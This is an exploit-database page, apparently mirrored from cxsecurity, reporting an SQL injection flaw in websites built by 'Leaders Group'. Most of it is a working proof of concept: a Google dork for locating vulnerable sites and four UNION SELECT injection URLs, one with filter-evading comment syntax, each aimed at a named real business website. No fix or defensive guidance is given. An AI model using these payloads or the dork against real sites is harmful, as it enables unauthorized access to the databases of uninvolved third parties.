Advertisement






Leaders Group - Sql Injection Vulnerability

CVE Category Price Severity
CWE-89 Not specified High
Author Risk Exploitation Type Date
Not specified High Remote 2023-04-11
CVSS
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023040050

Below is a copy:

Leaders Group - Sql Injection Vulnerability
*********************************************************
#Exploit Title: Leaders Group - Sql Injection Vulnerability
#Date: 2023-04-11
#Exploit Author: Behrouz Mansoori
#Google Dork: "By: Leaders Group"
#Category:webapps
#Tested On: mac, Firefox
 
 
Proof of Concept:
Search google Dork: "By: Leaders Group"
### Demo :

https://www.intermedica-vet.com/partner.php?p=p&id=-7%27%20union%20select%201,version(),3,4,5,6,7,8--+

https://meinvisum.at/en/country.php?p=Country&id=-2%27%20/*!12345union*/%20select%201,2,3,version(),5,6,7--+

https://www.premierpharmaco.com/details.php?t=services&id=-2%27%20union%20select%201,version(),3,4,5,6,7,8,9--+

https://topherbs.com.eg/du/product.php?id=-15%20UNION%20SELECT%201,2,3,4,5,6,7,version(),9,10,11,12,13,14,15,16--

********************************************************* 
#Discovered by: Behrouz mansoori
#Instagram: Behrouz_mansoori
#Email: [email protected]
*********************************************************

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.